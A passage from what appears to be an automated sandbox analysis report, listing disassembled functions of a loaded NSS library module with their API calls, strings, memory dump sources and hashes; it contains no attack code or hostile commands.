                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C461DD8
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C461E4F
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C461EA4
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C461ECD
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C461EEF
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C461F17
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C461F34
                                                                                                                                                                                                                                                      • PR_SetLogBuffering.NSS3(00004000), ref: 6C461F61
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C461F6E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C461F83
                                                                                                                                                                                                                                                      • PR_SetLogFile.NSS3(00000000), ref: 6C461FA2
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C461FB8
                                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(00000000), ref: 6C461FCB
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C461FD2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                      • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                      • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                      • Opcode ID: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                                                      • Instruction ID: 9eac069976ad8792fbc366bb460cb33eefb76ab86b586f47e734d0bd0bf36c7e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22517DB1E002599BDF00DBE6CC44F9E77B8AF05309F080529E816EBB49E771E918CB95
                                                                                                                                                                                                                                                      Function 6C546E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,6C40BE66), ref: 6C546E81
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C40BE66), ref: 6C546E98
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,?,?,?,?,?,?,6C40BE66), ref: 6C546EC9
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C40BE66), ref: 6C546ED2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C546EF8
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F1F
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F28
                                                                                                                                                                                                                                                      • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F3D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C40BE66), ref: 6C546FA6
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FDB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FE4
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FEF
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547014
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,6C40BE66), ref: 6C54701D
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C547030
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C54705B
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C40BE66), ref: 6C547079
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547097
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C5470A0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                      • String ID: PXl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                      • API String ID: 593473924-1839926694
                                                                                                                                                                                                                                                      • Opcode ID: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                                                      • Instruction ID: 1f6d9dd8d4a14d9bd13f1e76fdae3e36860dc56447b1169382f773de1766e511
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83518BB1A013116BE7109B309C51FBF36668F92358F148938E81596BC2FF25A91EC6D3
                                                                                                                                                                                                                                                      Function 6C4D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000,00000000,00000001), ref: 6C4D5009
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4D5049
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D505D
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C4D5071
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5089
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D50A1
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D50B2
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2), ref: 6C4D50CB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D50D9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4D50F5
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5103
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D511D
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D512B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5145
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5153
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D516D
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D517B
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5195
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                      • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                      • API String ID: 391827415-203331871
                                                                                                                                                                                                                                                      • Opcode ID: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                                                      • Instruction ID: 8d755990a2ee1e0775b61e8b42e9058d8f9c7937047295ca205803efd5059ae6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 365140F5A01116ABEB01EF249C51EAE37B8DF06249F150024EC59E7741EB25F915C7F2
                                                                                                                                                                                                                                                      Function 6C4D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C50
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C5B
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6C5AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C76
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4CAE
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CC9
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CF4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4D0B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D5E
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D68
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C4D4D85
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C4D4DA2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4DB9
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4DCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                      • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                      • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                      • Opcode ID: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                                                      • Instruction ID: d324d214552aceac84dbdb1468c0d23625c44a9b3373f380bc4fca2c22177879
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72418CB1900145ABEB12EF55AC54EBF3675AF82398F1B4128E8164BB01E731F925C7D3
                                                                                                                                                                                                                                                      Function 6C4B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C4B6943
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C4B6957
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C4B6972
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C4B6983
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4B69AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4B69BE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4B69D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4B69DF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C4B6A5B
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6D8C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6DC5
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6DD6
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6DE7
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6E1F
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E4B
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E72
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EA7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EC4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6ED5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6EE3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EF4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F08
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6F35
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F44
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F5B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6F65
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6F90
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6FC5
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3 ref: 6C4B6FF4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                      • String ID: +`Ll
                                                                                                                                                                                                                                                      • API String ID: 1304971872-107483513
                                                                                                                                                                                                                                                      • Opcode ID: f514ba6a3d124c41400df7bde6c6de4c4d82e7f3e2bd49f5c006ef931e9f0b96
                                                                                                                                                                                                                                                      • Instruction ID: 24e38675088e43109674bdb20c4d98268a4432938f8196fa35a8d0f60f78433e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f514ba6a3d124c41400df7bde6c6de4c4d82e7f3e2bd49f5c006ef931e9f0b96
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45B129B1E012199BEF04DBA9DC85FDEBBB8AF0524AF140029E815F7741E731A915CBB1
                                                                                                                                                                                                                                                      Function 6C461FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C462007
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6C462077
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000002C), ref: 6C4620DF
                                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 6C462188
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3 ref: 6C4621B7
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6C46221C
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C4622C2
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C4622CD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4622DD
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
                                                                                                                                                                                                                                                      • String ID: T ]l$X ]l
                                                                                                                                                                                                                                                      • API String ID: 3559583721-1146210263
                                                                                                                                                                                                                                                      • Opcode ID: 702c8ef653eb167796a70106d037ef9ce7752382bdd7065bf7b66a68aeaa0d60
                                                                                                                                                                                                                                                      • Instruction ID: cb353a9c0766dc503de996c58578f339482c7389c20736abd29f1b82cc6fda99
